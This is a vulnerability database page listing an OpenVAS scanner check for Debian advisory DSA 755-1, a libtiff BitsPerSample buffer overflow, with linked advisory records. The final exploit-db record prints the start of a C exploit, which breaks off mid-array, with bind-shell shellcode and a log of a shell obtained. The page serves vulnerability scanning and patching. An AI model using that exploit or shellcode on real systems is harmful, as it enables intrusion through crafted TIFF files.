Search...

Debian Security Advisory DSA 755-1 (tiff)

2008-01-17T00:00:00

ID OPENVAS:54339
Type openvas
Reporter Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com
Modified 2017-07-07T00:00:00

Description

The remote host is missing an update to tiff announced via advisory DSA 755-1.

Frank Warmerdam discovered a stack-based buffer overflow in libtiff, the Tag Image File Format library for processing TIFF graphics files that can lead to the executionof arbitrary code via malformed TIFF files.

For the old stable distribution (woody) this problem has been fixed in version 3.5.5-7

                                        
                                            # OpenVAS Vulnerability Test
# $Id: deb_755_1.nasl 6616 2017-07-07 12:10:49Z cfischer $
# Description: Auto-generated from advisory DSA 755-1
#
# Authors:
# Thomas Reinke &lt;reinke@securityspace.com&gt;
#
# Copyright:
# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largerly excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

include("revisions-lib.inc");
tag_solution = "For the stable distribution (sarge) this problem has been fixed in
version 3.7.2-3.

For the unstable distribution (sid) this problem has been fixed in
version 3.7.2-3.

We recommend that you upgrade your libtiff packages.

 https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20755-1";
tag_summary = "The remote host is missing an update to tiff
announced via advisory DSA 755-1.

Frank Warmerdam discovered a stack-based buffer overflow in libtiff,
the Tag Image File Format library for processing TIFF graphics files
that can lead to the executionof arbitrary code via malformed TIFF
files.

For the old stable distribution (woody) this problem has been fixed in
version 3.5.5-7";


if(description)
{
 script_id(54339);
 script_version("$Revision: 6616 $");
 script_tag(name:"last_modification", value:"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $");
 script_tag(name:"creation_date", value:"2008-01-17 23:00:53 +0100 (Thu, 17 Jan 2008)");
 script_bugtraq_id(13585);
 script_cve_id("CVE-2005-1544");
 script_tag(name:"cvss_base", value:"7.5");
 script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_name("Debian Security Advisory DSA 755-1 (tiff)");



 script_category(ACT_GATHER_INFO);

 script_copyright("Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com");
 script_family("Debian Local Security Checks");
 script_dependencies("gather-package-list.nasl");
 script_mandatory_keys("ssh/login/debian_linux", "ssh/login/packages");
 script_tag(name : "solution" , value : tag_solution);
 script_tag(name : "summary" , value : tag_summary);
 script_tag(name:"qod_type", value:"package");
 script_tag(name:"solution_type", value:"VendorFix");
 exit(0);
}

#
# The script code starts here
#

include("pkg-lib-deb.inc");

res = "";
report = "";
if ((res = isdpkgvuln(pkg:"libtiff-tools", ver:"3.5.5-7", rls:"DEB3.0")) != NULL) {
    report += res;
}
if ((res = isdpkgvuln(pkg:"libtiff3g", ver:"3.5.5-7", rls:"DEB3.0")) != NULL) {
    report += res;
}
if ((res = isdpkgvuln(pkg:"libtiff3g-dev", ver:"3.5.5-7", rls:"DEB3.0")) != NULL) {
    report += res;
}

if (report != "") {
    security_message(data:report);
} else if (__pkg_match) {
    exit(99); # Not vulnerable.
}

JSON Vulners Source

Initial Source

{"id": "OPENVAS:54339", "type": "openvas", "bulletinFamily": "scanner", "title": "Debian Security Advisory DSA 755-1 (tiff)", "description": "The remote host is missing an update to tiff\nannounced via advisory DSA 755-1.\n\nFrank Warmerdam discovered a stack-based buffer overflow in libtiff,\nthe Tag Image File Format library for processing TIFF graphics files\nthat can lead to the executionof arbitrary code via malformed TIFF\nfiles.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 3.5.5-7", "published": "2008-01-17T00:00:00", "modified": "2017-07-07T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=54339", "reporter": "Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com", "references": [], "cvelist": ["CVE-2005-1544"], "lastseen": "2017-07-24T12:50:05", "viewCount": 1, "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2017-07-24T12:50:05", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-1544"]}, {"type": "nessus", "idList": ["MANDRAKE_MDKSA-2006-042.NASL", "FREEBSD_PKG_68222076010B11DABC080001020EED82.NASL", "DEBIAN_DSA-755.NASL", "GENTOO_GLSA-200505-07.NASL", "UBUNTU_USN-130-1.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:1554"]}, {"type": "gentoo", "idList": ["GLSA-200505-07"]}, {"type": "openvas", "idList": ["OPENVAS:54939", "OPENVAS:54465"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:8665"]}, {"type": "debian", "idList": ["DEBIAN:DSA-755-1:F11EF"]}, {"type": "osvdb", "idList": ["OSVDB:16350"]}, {"type": "ubuntu", "idList": ["USN-130-1"]}, {"type": "freebsd", "idList": ["68222076-010B-11DA-BC08-0001020EED82"]}], "modified": "2017-07-24T12:50:05", "rev": 2}, "vulnersScore": 6.9}, "pluginID": "54339", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_755_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 755-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) this problem has been fixed in\nversion 3.7.2-3.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 3.7.2-3.\n\nWe recommend that you upgrade your libtiff packages.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20755-1\";\ntag_summary = \"The remote host is missing an update to tiff\nannounced via advisory DSA 755-1.\n\nFrank Warmerdam discovered a stack-based buffer overflow in libtiff,\nthe Tag Image File Format library for processing TIFF graphics files\nthat can lead to the executionof arbitrary code via malformed TIFF\nfiles.\n\nFor the old stable distribution (woody) this problem has been fixed in\nversion 3.5.5-7\";\n\n\nif(description)\n{\n script_id(54339);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:00:53 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(13585);\n script_cve_id(\"CVE-2005-1544\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Debian Security Advisory DSA 755-1 (tiff)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libtiff-tools\", ver:\"3.5.5-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff3g\", ver:\"3.5.5-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtiff3g-dev\", ver:\"3.5.5-7\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "Debian Local Security Checks"}

{"cve": [{"lastseen": "2020-10-03T11:34:54", "description": "Stack-based buffer overflow in libTIFF before 3.7.2 allows remote attackers to execute arbitrary code via a TIFF file with a malformed BitsPerSample tag.", "edition": 3, "cvss3": {}, "published": "2005-05-14T04:00:00", "title": "CVE-2005-1544", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2005-1544"], "modified": "2017-07-11T01:32:00", "cpe": ["cpe:/a:libtiff:libtiff:3.6.1", "cpe:/a:libtiff:libtiff:3.5.1", "cpe:/a:libtiff:libtiff:3.5.4", "cpe:/a:libtiff:libtiff:3.4", "cpe:/a:libtiff:libtiff:3.6.0", "cpe:/a:libtiff:libtiff:3.7.1", "cpe:/a:libtiff:libtiff:3.7.0", "cpe:/a:libtiff:libtiff:3.5.3", "cpe:/a:libtiff:libtiff:3.5.7", "cpe:/a:libtiff:libtiff:3.5.6", "cpe:/a:libtiff:libtiff:3.5.2", "cpe:/a:libtiff:libtiff:3.5.5"], "id": "CVE-2005-1544", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1544", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:libtiff:libtiff:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:libtiff:libtiff:3.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:libtiff:libtiff:3.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:libtiff:libtiff:3.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:libtiff:libtiff:3.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:libtiff:libtiff:3.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:libtiff:libtiff:3.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:libtiff:libtiff:3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:libtiff:libtiff:3.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:libtiff:libtiff:3.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:libtiff:libtiff:3.4:*:*:*:*:*:*:*", "cpe:2.3:a:libtiff:libtiff:3.5.5:*:*:*:*:*:*:*"]}], "ubuntu": [{"lastseen": "2020-07-09T19:35:27", "bulletinFamily": "unix", "cvelist": ["CVE-2005-1544"], "description": "Tavis Ormandy discovered a buffer overflow in the TIFF library. A \nmalicious image with an invalid \"bits per sample\" number could be \nconstructed which, when decoded, would have resulted in execution of \narbitrary code with the privileges of the process using the library.\n\nSince this library is used in many applications like \"ghostscript\" and \nthe \"CUPS\" printing system, this vulnerability may lead to remotely \ninduced privilege escalation.", "edition": 5, "modified": "2005-05-20T00:00:00", "published": "2005-05-20T00:00:00", "id": "USN-130-1", "href": "https://ubuntu.com/security/notices/USN-130-1", "title": "TIFF library vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:47:01", "bulletinFamily": "unix", "cvelist": ["CVE-2005-1544"], "description": "### Background\n\nlibTIFF provides support for reading and manipulating TIFF (Tag Image File Format) images. \n\n### Description\n\nTavis Ormandy of the Gentoo Linux Security Audit Team discovered a stack based buffer overflow in the libTIFF library when reading a TIFF image with a malformed BitsPerSample tag. \n\n### Impact\n\nSuccessful exploitation would require the victim to open a specially crafted TIFF image, resulting in the execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll libTIFF users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-libs/tiff-3.7.2\"", "edition": 1, "modified": "2006-05-22T00:00:00", "published": "2005-05-10T00:00:00", "id": "GLSA-200505-07", "href": "https://security.gentoo.org/glsa/200505-07", "type": "gentoo", "title": "libTIFF: Buffer overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:12", "bulletinFamily": "software", "cvelist": ["CVE-2005-1544"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.remotesensing.org/libtiff/\nVendor Specific News/Changelog Entry: http://bugzilla.remotesensing.org/show_bug.cgi?id=843\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/openserver5/507/mp/osr507mp4/osr507mp4.htm)\n[Vendor Specific Advisory URL](http://wwwnew.mandriva.com/security/advisories?name=MDKSA-2006:042)\n[Vendor Specific Advisory URL](ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.49/SCOSA-2005.49.txt)\nSecurity Tracker: 1013944\n[Secunia Advisory ID:15331](https://secuniaresearch.flexerasoftware.com/advisories/15331/)\n[Secunia Advisory ID:18289](https://secuniaresearch.flexerasoftware.com/advisories/18289/)\n[Secunia Advisory ID:15431](https://secuniaresearch.flexerasoftware.com/advisories/15431/)\n[Secunia Advisory ID:15629](https://secuniaresearch.flexerasoftware.com/advisories/15629/)\n[Secunia Advisory ID:16872](https://secuniaresearch.flexerasoftware.com/advisories/16872/)\n[Secunia Advisory ID:17645](https://secuniaresearch.flexerasoftware.com/advisories/17645/)\n[Secunia Advisory ID:18943](https://secuniaresearch.flexerasoftware.com/advisories/18943/)\n[Secunia Advisory ID:15320](https://secuniaresearch.flexerasoftware.com/advisories/15320/)\n[Secunia Advisory ID:16063](https://secuniaresearch.flexerasoftware.com/advisories/16063/)\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200505-07.xml\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2005.34/SCOSA-2005.34.txt\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2006.3/SCOSA-2006.3.txt\nOther Advisory URL: http://www.ubuntulinux.org/support/documentation/usn/usn-130-1\nOther Advisory URL: http://www.novell.com/linux/security/advisories/2005_14_sr.html\nOther Advisory URL: http://www.debian.org/security/2005/dsa-755\nKeyword: sr894564,fz532775,erg712889\nKeyword: SCOSA-2005.49\n[CVE-2005-1544](https://vulners.com/cve/CVE-2005-1544)\n", "modified": "2005-05-05T04:09:09", "published": "2005-05-05T04:09:09", "href": "https://vulners.com/osvdb/OSVDB:16350", "id": "OSVDB:16350", "type": "osvdb", "title": "LibTIFF BitsPerSample Tag Overflow", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2017-07-02T21:10:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1544"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2016-10-04T00:00:00", "published": "2008-09-04T00:00:00", "id": "OPENVAS:54465", "href": "http://plugins.openvas.org/nasl.php?oid=54465", "type": "openvas", "title": "FreeBSD Ports: tiff", "sourceData": "#\n#VID 68222076-010b-11da-bc08-0001020eed82\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n tiff\n linux-tiff\n pdflib\n pdflib-perl\n fractorama\n gdal\n iv\n ivtools\n ja-iv\n ja-libimg\n paraview\n\nCVE-2005-1544\nStack-based buffer overflow in libTIFF before 1.53 allows remote\nattackers to execute arbitrary code via a TIFF file with a malformed\nBitsPerSample tag.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://bugzilla.remotesensing.org/show_bug.cgi?id=843\nhttp://www.gentoo.org/security/en/glsa/glsa-200505-07.xml\nhttp://www.remotesensing.org/libtiff/v3.7.3.html\nhttp://www.vuxml.org/freebsd/68222076-010b-11da-bc08-0001020eed82.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\nif(description)\n{\n script_id(54465);\n script_version(\"$Revision: 4203 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-10-04 07:30:30 +0200 (Tue, 04 Oct 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_bugtraq_id(13585);\n script_cve_id(\"CVE-2005-1544\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: tiff\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"tiff\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.7.3\")<0) {\n txt += 'Package tiff version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"linux-tiff\");\nif(!isnull(bver) && revcomp(a:bver, b:\"3.6.1_3\")<0) {\n txt += 'Package linux-tiff version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"pdflib\");\nif(!isnull(bver) && revcomp(a:bver, b:\"6.0.1_2\")<0) {\n txt += 'Package pdflib version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"pdflib-perl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"6.0.1_2\")<0) {\n txt += 'Package pdflib-perl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"fractorama\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>0) {\n txt += 'Package fractorama version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"gdal\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>0) {\n txt += 'Package gdal version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"iv\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>0) {\n txt += 'Package iv version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ivtools\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>0) {\n txt += 'Package ivtools version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ja-iv\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>0) {\n txt += 'Package ja-iv version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ja-libimg\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>0) {\n txt += 'Package ja-libimg version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"paraview\");\nif(!isnull(bver) && revcomp(a:bver, b:\"0\")>0) {\n txt += 'Package paraview version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:50:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-1544"], "description": "The remote host is missing updates announced in\nadvisory GLSA 200505-07.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "id": "OPENVAS:54939", "href": "http://plugins.openvas.org/nasl.php?oid=54939", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200505-07 (tiff)", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The libTIFF library is vulnerable to a buffer overflow, potentially\nresulting in the execution of arbitrary code.\";\ntag_solution = \"All libTIFF users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/tiff-3.7.2'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200505-07\nhttp://bugs.gentoo.org/show_bug.cgi?id=91584\nhttp://bugzilla.remotesensing.org/show_bug.cgi?id=843\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200505-07.\";\n\n \n\nif(description)\n{\n script_id(54939);\n script_cve_id(\"CVE-2005-1544\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_name(\"Gentoo Security Advisory GLSA 200505-07 (tiff)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"media-libs/tiff\", unaffected: make_list(\"ge 3.7.2\"), vulnerable: make_list(\"lt 3.7.2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T14:26:00", "description": "LibTiff 3.7.1 (BitsPerSample Tag) Local Buffer Overflow Exploit. CVE-2005-1544. Local exploits for multiple platform", "published": "2006-03-05T00:00:00", "type": "exploitdb", "title": "LibTiff 3.7.1 BitsPerSample Tag Local Buffer Overflow Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-1544"], "modified": "2006-03-05T00:00:00", "id": "EDB-ID:1554", "href": "https://www.exploit-db.com/exploits/1554/", "sourceData": "/*\n LibTIFF exploit\n Tested on LibTIFF 3.7.1\n Coded by Agustin Gianni (agustingianni at gmail.com) and Samelat\n\n Blog: http://gruba.blogspot.com\n \n In other versions and/or Linux distributions you might need to\n adjust some offsets.\n\n gr00vy@kenny:/home/gr00vy/EXPLOIT$ make libtiff_exploit\n cc libtiff_exploit.c -o libtiff_exploit\n gr00vy@kenny:/home/gr00vy/EXPLOIT$ ./libtiff_exploit /usr/local/bin/tiffinfo evil.tiff\n Using RET: 0xbfffffb4\n TIFFReadDirectory:\n Warning, evil.tiff: unknown field with tag 260 (0x104) encountered.\n evil.tiff:\n Warning, incorrect count for field \"PhotometricInterpretation\" (150341633, expecting 1); tag trimmed.\n evil.tiff:\n Warning, incorrect count for field \"BitsPerSample\" (257, expecting 1); tag trimmed.\n sh-3.00$\n\n gr00vy@kenny:/home/gr00vy/storage/Exploits/Libtiff-3.7.1$ ./libtiff_exploit\n /usr/kde/3.3/bin/konqueror evil.tiff\n Linux Enabled\n Using RET: 0xbfffffb1\n konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider\n konqueror: ERROR: Error in BrowserExtension::actionSlotMap(), unknown action : searchProvider\n TIFFReadDirectory: Warning, : unknown field with tag 260 (0x104) encountered.\n : Warning, incorrect count for field \"PhotometricInterpretation\" (150341633, expecting 1);\n tag\n trimmed.\n : Warning, incorrect count for field \"BitsPerSample\" (257, expecting 1); tag trimmed.\n sh-3.00$ exit\n exit\n\n Heheh it also works like a remote exploit i would leave that work (easy work) for the\n \"interested\" people.\n\n*/\n\n#include <stdlib.h>\n#include <string.h>\n#include <stdio.h>\n#include <unistd.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <fcntl.h>\n\n#define OFFSET 0x3F /* return address offset */\n#define SHELL_OFFSET 0x0102 /* shellcode address offset */\n#define DISPLAY \"DISPLAY=:0.0\" /* no comments ... */\n#define HOMEDIR \"HOME=/tmp/\"\n\nint\nmain(int argc, char **argv, char **env)\n{\n /* Linux shellcode that binds a shell on port 4369 */\nchar linux_bind[] = \"\\x31\\xc0\\x50\\x40\\x50\\x40\\x50\\xb0\\x66\\x31\"\n \"\\xdb\\x43\\x89\\xe1\\xcd\\x80\\x99\\x52\\x52\\x52\"\n \"\\xba\\x02\\x01\\x11\\x11\\xfe\\xce\\x52\\x89\\xe2\"\n \"\\x31\\xc9\\xb1\\x10\\x51\\x52\\x50\\x89\\xc2\\x89\"\n \"\\xe1\\xb0\\x66\\xb3\\x02\\x89\\xe1\\xcd\\x80\\xb0\"\n \"\\x66\\xb3\\x04\\x53\\x52\\x89\\xe1\\xcd\\x80\\x31\"\n \"\\xc0\\x50\\x50\\x52\\x89\\xe1\\xb0\\x66\\xb3\\x05\"\n \"\\xcd\\x80\\x89\\xc3\\x31\\xc9\\xb1\\x03\\xb0\\x3f\"\n \"\\x49\\xcd\\x80\\x41\\xe2\\xf8\\x51\\x68\\x6e\\x2f\"\n \"\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x51\"\n \"\\x53\\x89\\xe1\\x99\\xb0\\x0b\\xcd\\x80\";\n\n /* (?) lies lies lies lies!*/\n #ifdef FREEBSD\n printf(\"FreeBSD Enabled\\n\");\n char shellcode[]=\n \"\\xeb\\x0e\\x5e\\x31\\xc0\\x88\\x46\\x07\\x50\\x50\\x56\\xb0\\x3b\\x50\\xcd\"\n \"\\x80\\xe8\\xed\\xff\\xff\\xff\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x23\";\n \n #else\n printf(\"Linux Enabled\\n\");\n char shellcode[] =\n 